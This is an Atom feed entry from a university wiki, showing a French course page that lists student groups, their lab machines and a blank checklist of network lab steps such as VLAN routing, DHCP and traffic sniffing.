		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_construction_de_r%C3%A9seau_2025/2026&amp;diff=10527"/>
		<updated>2025-10-08T12:00:51Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : /* Promotion SE4_SI */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&lt;br /&gt;
= Avancement des élèves sur le TP de construction réseau pour 2025/2026 =&lt;br /&gt;
&lt;br /&gt;
== Promotion SE4_SI ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! N° réseau !! N° tiroir !! Elèves || Machines&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1 || G1 || Mario Sylainx S. GAUTHIER || reuze01, bimberlot01&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2 || G2 || Prénom NOM || reuze02, bimberlot02&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3 || G3 || Prénom NOM || reuze03, bimberlot03&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4 || G4 || Aurèle VANGHELUWE || reuze04, bimberlot04&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5 || G5 || Billel CHEKLAT || reuze05, bimberlot05&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6 || G6 || Evora Souop || reuze06, bimberlot06&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7 || G7 || Cédric PAYET || reuze11, bimberlot11&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8 || G8 || Agathe HOUDUSSE || reuze12, bimberlot12&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9 || G9 || Tom MERIEN || reuze13, bimberlot13&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10 || G10 || Lilia GHAZALI || reuze14, bimberlot14&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11 || G11 || Thomas DELOBELLE || reuze15, bimberlot15&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12 || G12 || Prénom NOM || reuze16, bimberlot16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Etape !! Vérification par l'intervenant&lt;br /&gt;
|-&lt;br /&gt;
| Commutation même VLAN filaire || &lt;br /&gt;
|-&lt;br /&gt;
| Accès &amp;lt;code&amp;gt;ssh&amp;lt;/code&amp;gt; au routeur ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage entre VLAN filaires ||&lt;br /&gt;
|-&lt;br /&gt;
| Visibilité des réseaux WiFi (test smartphone) ||&lt;br /&gt;
|-&lt;br /&gt;
| Fonctionnement du serveur DHCP (test smartphone) || &lt;br /&gt;
|-&lt;br /&gt;
| Routage entre VLAN WiFi et filaires ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage inter-réseaux ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage Internet méthode 1 || &lt;br /&gt;
|-&lt;br /&gt;
| Routage Internet méthode 2 ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage Internet méthode 3 ||&lt;br /&gt;
|-&lt;br /&gt;
| Reniflage réseau HTTP/HTTPS telnet/SSH||&lt;br /&gt;
|-&lt;br /&gt;
| Manipulation des protocoles HTTP et SMTP ||&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
</feed>